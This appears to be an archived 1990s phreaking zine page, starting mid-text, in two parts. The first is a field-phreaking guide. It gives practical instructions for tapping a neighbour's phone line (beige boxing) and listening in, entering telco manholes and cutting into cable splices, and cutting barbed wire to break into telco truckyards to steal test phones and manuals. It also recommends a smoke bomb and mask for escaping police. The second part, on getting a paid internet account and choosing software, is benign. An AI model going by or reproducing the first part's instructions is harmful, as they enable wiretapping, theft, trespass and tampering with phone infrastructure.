I would either delete it or find a suitable alternative. The only
exception that I made is for parts which could be found at your local
Rat Shack (Radio Shack) for under five dollars. The second version is
a kit that is made of the finest tools in which case time, money and
risk are not of any concerns. It may involve several plant department
runs as well as several trips to Rat Shack.

1.1 Homemade Field Kit:
I will first make a checklist of what is needed then I will explain
each item in detail.

°Backpack °Test Phone °7/16 ratchet °3/8 ratchet °Phillips screwdriver

°Flat screwdriver °Wire cutters °Pliers °Utility Knife °Pen light

°Flashlight °Gloves °Pencil@Paper °Smoke Bomb °Matches °Mask/Bandanna

°Sharpie(R) marker

1.111 Backpack: Get a large, black one with several pockets to hold materials.
Make sure that there is enough room in the main compartment
to put in anything that you may pick up at a plant department.

1.112 Test Phone: One of a phreak's most important tools. Used to tap into
lines and access telephone boxes. If you already have one
you are all set, if not I will give you instructions later
on in the file.

1.113 7/16 and 3/8 Ratchet: Used to open up TelCo boxes. Just carry a ratchet
and put the two sockets in a pocket of your bag.

1.114 Pliers: Used for misc. stuff. Always smart to carry.

1.115 Utility Knife: Others have said that a regular pocket knife or Xacto
knife would work. They are full of shit. A utility knife
serves the same purpose as a Xacto and is much more
durable.

1.116 Penlight: Small and safe. Useful for use when you are working in a
box. Also good when a large light is not practical or smart.

1.117 Flashlight: Get the best one that you can possibly find. Make sure it
is durable. A great, strong light ain't shit if the friggin
thing breaks on you. Also do not use at the box itself
unless you are in a remote area. Useful for getting to your
spot and then taking notes afterward.

1.118 Gloves: Very important. I do not think that I have to explain the many
reasons for carrying these. Any type will do. I use last
seasons batting gloves.

1.119 Pen(cil)@Paper: Used for writing down things as phone numbers and
locations. Pen or pencil is whatever you prefer. I
usually go with a pencil but a pen is fine. Get a small
pad that has a covering over it. Something that is
a leather or something. You usually get things like
this free as promotional gimmicks at seminars and the
like. Also make sure it can fit into your pocket with
out much difficulty.

1.120 Smoke Bomb: This, or any other number of devices can be effectively
used to at least distract TelCo personnel or local law
enforcement to give you enough time to leave.

1.121 Matches: Important for both survival and lighting things such as
smoke bombs.

1.122 Mask/Bandanna: Hide your identity and also helps when in a dusty
area.

1.123 Sharpie: Used to mark your territory and identify things later on.


Test Phone:
===========

The Test Phone is the most useful piece of equipment for Field Phreaking. You
can try to sneak into a telco Plant Department [truckyard] and get a real
test phone out of a truck like we did. If you'd rather not do this, don't
worry; making your own test phone is ultra-easy.

First, get a telephone for your own purposes. Find the wire coming out of
the phone that is supposed to go to the wall's modular jack. It should be at
least three feet long for convenience. Cut off the modular jack at the end
of the wire. Strip the wire, and there should be two or four small wires
inside. Hook the two middle wires to alligator clips [preferably insulated].
You now have a test phone! Very easy, indeed. Now let's see if you hooked
everything up ok. First find your phone box. It'll probably be on the
outside of your house. It's fairly small, and you might need the ratchet to
open it up. Once you get it open, you should see some screws. These are the
terminals for your phone line. Hook the alligator clips to the two top
terminals. If your phone is ok, you should get a dial tone. Once you know
that your phone is working, a whole new world opens up to you! You can hook
the phone up to your neighbor's terminal and call long distance or yell at
the operator on their line. Be careful, though. You don't want to be
talking to Sue in L.A. when your neighbors are home and awake. If they pick
up the phone when you're already on, you could get into serious trouble. Of
course, you could always listen in on them! If you want, you can hook wires
up to your neighbor's terminal and lead them to your house. In case you
didn't know, this is called Beige Boxing. You can then hack computers on
their line, call Dial-A-Prayer, etc. Make sure to hide the wire well so that
it won't be traced to your house!


Manholes:
=========

One way to get access to an abundance of phone lines is by getting into telco
manholes. You don't want to accidentally get in a sewer manhole, so the first
thing to do is find the differences between sewer and telephone manholes. If
you have trouble with this, here's a few tips that might help:

o Telco manhole covers are usually larger and heavier than other covers.
o Telco manholes are scarce compared to sewer manholes. So if there are
a lot of checkered manhole covers in your area, those are probably sewer
manholes. If there are only a handful of unmarked manhole covers in
your area, those probably contain phone lines.
o Go to your local telco Central Office [CO] and find out what the manhole
covers look like there. Find manhole covers that look the same in other
areas, and pick a convenient/safe manhole to explore.


Once you get the manhole cover off, shine a flashlight down to see if there's
a ladder going to the bottom. Try a different manhole if there's no ladder.
If you want to go down a manhole, don't forget to wear a bandana or surgical
mask over your mouth so that you don't choke on dust. Also bring a flashlight
so you can see what you're doing. Many times, there'll be a few inches of
water at the bottom, so you might also want to wear boots.

Down in the manhole, you might find some equipment or manuals. Go ahead and
take them if you want; you deserve it! There should be some very large ABS
plastic tubes going across the "
room" you're in. The phone lines are inside
these tubes. Attached to this tubing there will be some short, wide plastic
cylinders. There'll be screws holding these cylinders on to the tubing.
You'll need either a screwdriver or a ratchet to open a cylinder. If you
happen to get a cylinder open, congratulations! You now have access to
countless phone lines! We'll leave it to you to figure out what to do with
all of those wires. Surely you'll figure something out! [snip, snip!]


Exploring Telco Building Sites:
===============================

One of the best ways to get information about telco is by going to a Central
Office near you, exploring the trucks in a Plant Department, or "
visiting"
other telco buildings. The phone company is careless in many ways. They
leave important, yet unshredded documents and computer printouts in their
open dumpsters. Their cars, vans, and repair vehicles are almost always left
unlocked. Inside their vehicles one can usually find manuals, test phones,
computer cards [usually for mainframes, almost never for personal computers],
nice tool sets, etc.! It's almost as if they *want* to be ripped off! They
deserve bad treatment just for their negligence. If possible, we like to be
courteous to individual employees of telco. Most employees are fairly amiable
and don't deserve trouble. It's the beuracracy of telco that deserves to be
manhandled. Cheap practices such as monopolizing and the overpricing of
services is the general reason why we phreaks do what we do with such
determination. On with the show.

Exploring Dumpsters: Looking inside telco dumpters is probably the easiest
way to acquire useful information. Typycally, dumpters will be found outside
a Central Office. They are usually left open for the world to see. It's a
good idea to check a dumpster near you every day or two. You want to get your
printouts and such before they go to the garbage dump. Make sure that you
aren't pulling stuff out of the dumpster when the employees get out for the
day! If possible, check the dumpster after closing hours just to be safe. But
it's usually ok to get stuff out of it during working hours. You should find a
lot of useful information, including computer numbers, if you consistently
check the dumpsters.

Exploring Plant Departments: Plant Department is just a strange name telco
made for a truckyard. You might need your 'ol wire cutters for this job.
Plan to stay up late for this mission, too. Around here, at least, the Plant
Department doesn't close until 11:30 to 11:45 p.m. If your local Plant
Department isn't bound by barbed-wire fences, you're lucky. If,
unfortunately, it's like ours, you'll have to find a way to get in. First,
try to find breaks in the fence where you might be able to slip through. If
this isn't possible, and you can't climb over the fence because there's
barbed-wire at the top, get out the [gasp!] wire cutters. Cut the barbed-wire
and climb over the fence. Quietly move around the truck yard, opening various
trucks, taking whatever you want. Although it might be hard, try to control
yourself. Only take one item per truck so that the fools don't get
suspicious. You don't ever want them to get suspicious, or you'll never be
able to go back without fearing that they might be watching the truckyard for
intruders. Just take a testphone and a few handy manuals. The testphone is
usually in the back behind the passenger's seat. Manuals should be in the
glove compartment or between the two front seats. The rest of the gadgets in
the trucks have little or no practical uses for phreaks. Too bad. Be cool
and don't take anything you don't need.


STOLEN INTERNET ACCOUNTS: HOW TIRED BY KEY MASTER:

Are you sick of switching internet accounts every month after they finally
"
find out"? The constant pain for others to even contact you, part of the
point for having an account in the first place, because your damn address
keeps changing! Maybe you are one of those people who have a fake account
just to say you have one. Remember the whole point of the internet? To
exchange information... to communicate...? How can you do that when you keep
having to relocate so no one can find you? How tired.

I'm just sick of the whole deal. Not using the account too much this day or
too much that day... not doing that, not doing this... or else. Oops! The
number is gone.. time to get another account.

This article is basically about getting a real account the non-|<-rad way to
the Internet and what tools you can use for FULL access to everything it has
to offer. I have included the more popular service providers, their phone
numbers, and a list of popular software you can choose from to use for your
new account or your existing account. It's quite easy if you have the right
knowledge.

I don't want to give the complete history of the internet or whatever, I
don't have time to write about that. Here is the nuts and bolts for total
access to the 'net. Yeah! I will first explain how to get an account, and
then list the best software for use with your new or existing account.


PART I: OPTIONS. (w/ brief summary) (BEST -> WORST ACCESS)

a. Dedicated (Direct) Account.

You Lucky Bastard! The most expensive type, typically
used by universities for their students/employees.

Average cost/month: usually free, actually.

b. Dial-In SLIP/PPP Account.

Like... Your Own IP Address. You dial into a company
that has a direct connection; usually Windows-based.
Depending on your software, this can be a VERY easy way
to navigate the internet.

Average cost/month: $15 to $35

c. Dial-In Shell Account.

And this, My Friends, is UNIX (some providers use other
operating systems). You dial into a company that has a
direct connection; usually DOS-based. For the die-hard
UNIX command line oriented. Recently, however, some
providers have a Windows interface available--probably
not as flexible as the UNIX command line equivalent.

Average cost/month: $10 to $20

d. Online Services; Dail-In Terminal.

Prepare to be ripped off. CompuServe (CIM), America
Online (AOL), Prodigy. Note: Prodigy and CompuServe
(and Delphi soon) have started offering SLIP/PPP
connections. These services, however, hold your hand
every step of the way--good for beginners and
recommendations to beginners.

Average cost/month: $10 to $20, plus "
extra" (That
"
extra" adds up quick unless you plan to lurk around
"
basic services" picking your nose..)

Quick & Dirty general recommendations:

Delphi - Prized for its internet access
CompuServe - Prized for its data (and interface,
but interface not as good as America
Online.)
America Online - Prized for its interface and
user hand-holding (and data, but
data not as good as CompuServe.)
Prodigy - Popular for little kiddies, ALSO prized
for Stock information for executives.
(Nice combo, eh?)

e. BBS Accounts.

Better than nothing, I guess. Some bulletin board
systems offer their users VERY LIMITED (but still real)
access to the internet, usually in the way of offline
email and offline message networks only. One thing to
note is how often the BBS connects to the internet to
do processing.

Average cost/month: FREE to $15


Those are all your internet options. Choose one or even
more than one. I recommend the following type of account
package if you can find it (IDEAL):

o Dial-In SLIP/PPP Account with optional Dial-In Shell
Account, all in one account package. (PPP is better than
SLIP, so try to get a PPP connection.)

o Dial-In speed of at least "
v.32bis" (14.4), "v.32terbo"
(19.2), or "
v.34" (28.8). (Note, "v.fc" is also 28.8.)

o A LOCAL ACCESS NUMBER with which you can call to without
being charged by your phone company. A "
local call".

o A FLAT RATE with unlimited time, so you don't pay $$
for every hour you go over some sort of limit of hours.

o A LOW one-time "
Set Up" fee.


Some internet access providers are listed below--most
include Dedicated, SLIP/PPP, Shell, and UUCP (for BBS
SysOps) accounts. Note: "
UUCP" is a popular service that
bulletin board system operators use to get their users
internet email accounts and internet message network
access.

Philadelphia area access providers.. contact for details.
(Might want to print this section out...)

DCANet (302 "
open for business soon") 302-654-1019
Digital Express (609,others) 301-220-2020, 800-969-9090
(sales@digex.net)
FAST.NET (610,800) 610-954-5910 (sales@fast.net)
FishNet (215,610) 610-337-9994
Internet Online Services/IDT (215,others?) 800-245-8000
LibertyNet (215 "
opening late spring") 215-387-2255
(webmaster@libertynet.org)
MicroServe (215,610,717) 800-380-INET (inf@microserve.com)
NetAccess (215,610) 215-576-8669 (info@netaxs.com)
N.J. Computer Connection (609) 609-896-2799
(info@pluto.njcc.com)
Oasis (215,610,717) 610-439-8560 (info@ot.com)
SSNet (302,610) 302-378-1386 (info@ssnet.com)
VoiceNet/DSC (215,609,610) 215-674-9290
(support@voicenet.com)
WaterWheel (609) 609-596-0032 (info@waterw.com)


National area access providers.. contact for details.

AlterNet 800-4UUNET4
NetCom 408-983-5950 ("
@netcom.com")
Portal Info Network 800-433-6444, 408-973-9111
PSINet 703-620-6651, 703-709-0300 (info@psi.com)


215 area BBS access providers.. contact for details.

The National Cheese Emporium 215-673-0261
(FREE INTERNET EMAIL ADDRESSES -- Accounts set up on this
board will end in "
@tnce.com")


~~~
Please let me know if any of this information is incorrect!
___


PART II: SOFTWARE.

1. Dial-In Shell Account.

All you need is probably what you already have and use: a
communications terminal program like Q-Modem, Telemate,
Telix, or ProComm. Usually, Shell Accounts require your
software to emulate VT-100 or later for a text-based menu
or command line system. All the before-mentioned programs
support VT-100 or later. Note that ANSI text color is
rarely seen (if ever?) in the UNIX world.

Recently, however, some providers have enhanced their tools
with easy-to-use Windows graphical user interfaces for
Shell Accounts.

2. Dial-In SLIP/PPP Account.

This is where the hyped graphical World Wide Web (WWW) can
be accessed, with the right software.

SOFTWARE. (w/ brief summary)

a. Spry's Internet in a Box V2.0.

The most popular and general ease-of-use winner out of all
commercial internet packages. Comes with Spry Mosaic WWW
browser and a host of other utilities. Impressive GIF/JPG
viewer comes with it called ImageView. Retails for about
$100 in the store.

b. Netmanage Inc.'s Internet Chameleon.

Probably the second most popular. Comes with a host of
utilities, including ARCHIE, FINGER, and PING, which Spry's
Internet in a Box V2.0 doesn't have. In general, not as
easy to use as Spry's package, however. Retails for about
$50 with no manuals if upgrading from the shareware
version. Price unknown for it with manuals in the store.

c. Trumpet WinSock.

A very handy protocol for Windows. The most recent version
now supports both SLIP and PPP access accounts. It acts as
a dialer and SLIP/PPP protocol translator for other
programs, like, for example, Netscape Navigator, which
REQUIRES a program like this to even run. Can be found by
an anonymous FTP to ftp.trumpet.com.au or to
inorganic5.chem.ufl.edu in the gopher/pub/winsock
directory.

d. Netscape Navigator.

Considered the best WWW browser. Now, however, more recent
versions of other browsers are coming out which compete
with this shareware product feature-wise. Can be found by
an anonymous FTP to ftp.mcom.com in the Netscape directory.

e. Plug 'n Play Mosaic.

There's those words again. This package is in no way plug
and play in which it claims. Comes with the NCSA Mosaic
WWW browser.

f. NetCruiser.

If you go with NETCOM as an access provider, this is the
software you will be sent.

g. Internaut.

If you go with PSINET as an access provider, this is the
software you will be sent.

h. Lynx.

TEXT-BASED shareware program for viewing the WWW. Not as
neato and pretty as the graphical versions, like, for
example, Mosaic or Netscape.

i. Eudora.

Very popular shareware email program.

j. WS_FTP.

Very popular shareware FTP program.


I recommend the following software:

o Spry's Internet in a Box V2.0 -- great if you have the
money to blow. Will be well worth it. Spry's Mosaic
V2.0 WWW browser is now as good as Netscape.

o Trumpet WinSock, Netscape, Eudora, WS_FTP, and any other
shareware internet program you can get your hands on.
This approach, while harder to set up, is.. free.


And that brings this article to a close, almost. Here are
some handy-dandy numbers:

800-848-8980, option 2 - CompuServe local access numbers.
(Some providers are using CompuServe's network of modem
installations for access to THEIR service... go figure)

800-877-5045, option 1,2 - SprintNet local access numbers.
(Some providers give SprintNet as an EXPENSIVE option, but
never tell you your correct local access number for it)



← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT